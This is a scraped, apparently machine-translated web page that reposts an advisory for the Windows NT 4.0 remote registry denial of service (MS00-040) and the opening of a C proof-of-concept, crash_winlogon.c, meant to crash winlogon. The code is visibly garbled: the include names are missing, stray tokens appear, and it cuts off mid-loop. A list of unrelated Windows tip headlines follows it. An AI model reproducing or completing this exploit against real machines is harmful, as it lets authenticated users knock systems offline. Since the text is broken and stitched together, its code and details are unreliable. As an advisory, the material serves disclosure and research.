59, Windows NT 4.0 Remote Registry Denial of Service Attack Vulnerability
Windows NT 4.0 Remote Registry Denial of Service Attack Vulnerability Release Date: Affected Systems: - Microsoft Windows NT 4.0 Workstation - Microsoft Windows NT 4.0 Server - Microsoft Windows NT 4.0 Server, Enterprise Edition - Microsoft Windows NT 4.0 Server,
Terminal Server Edition is not affected System: Windows 2000 Description: Before the remote host's access request to the registry is processed, it needs to be registered remotely. The table server is authenticated. If you submit a request in an incorrect format, the remote registry
server error will be interpreted and an error will occur and will not work. In Windows Nt 4.0, since the registry server is included in the winlogon.exe system process, an error in this process will result in the entire system being unavailable. Note that only one user who has been authenticated by
can initiate such a request, and an anonymous (empty session) connection cannot cause such a denial of service attack. The attacked system must be restarted to function properly. <* Source:
Renaud Deraison from Nessus Team Microsoft Security Bulletin (MS00-040)*> Test Procedure: WARNING The following procedures (methods) may be offensive and are intended for security research and teaching purposes only. . Users are at their own risk! /** crash_winlogon.c**
by Renaud Deraison - [email protected]** This code is released under the GNU General Public License.*
(thanks for respecting this License)** In case you are wondering, here is the motto I applied for this code :**
"Structures are for sissies"*/#include #include #ifdef WIN32#include #define bzero(x , y) memset(x, 0, y)#else#include #include
#include #include #define closesocket(x) close(x)#endifchar * netbios_name(char * orig){int I, Len;char * ret = malloc(40);bzero(ret, 40);len = strlen(orig);for(I=0;I<16;I++){ if(I >= len) strcat(ret, "CA"); else { int odiv, omod; odiv = (orig[I] /16) + 'A'; omod =
(orig[I] % 16) + 'A'; ret[ ,null,null,3],Strlen(ret)]=odiv; ret[strlen(ret)]=omod; }}return(ret);}char * netbios_redirector(){int I;char * ret = malloc(31);bzero(ret, 31) ;for(I=0;I<15;I++)strcat(ret, "CA");strcat(ret, "AA");return(ret);}char* unicode(char * data){int len = strlen (data); int I; char * ret = malloc(110); int l = 0; bzero(re t,110);for(I=0;I
Nowadays, there are more and more friends using high-speed Internet access such as ADSL and
Automatic Updates One of the important safeguards for keeping Windows systems and software up to dat
In order to better use Windows, the author will introduce a few tips for searching for applications.
Fourth, Security Center The Security Center is responsible for the monitoring of firewalls,
Windows XP Professional Computer Boot Process Overview
Words XP virtual memory optimization
Set the cache file location Free system disk space
New broadband dialing solution using PPPOE mode as gray
There is no "System Restore" tab in the system properties. Solution
PrintScreen key knows how much
Three major Windows system failure recovery book
XP weight loss tips big release
Beginner's Guide: A New Use of Large Memory
Retrieving Win XP System Language Bar Lost Solution Three Cases
Win7 system web page can not open how to solve
Xp Tips to Repair Lost BOOT.ini File
Win2008, Vista driver compatibility problem resolution
Seven super practical methods to improve the performance of Windows7 (2)
Win 7 genuine serial number shows the wrong solution
Flowers come from China! Win7 theme "Japanese cherry blossom" download
QQ friends reach the upper limit solution
New Win8 application release speed slows down
Skillful learning, making xp system copy and move more convenient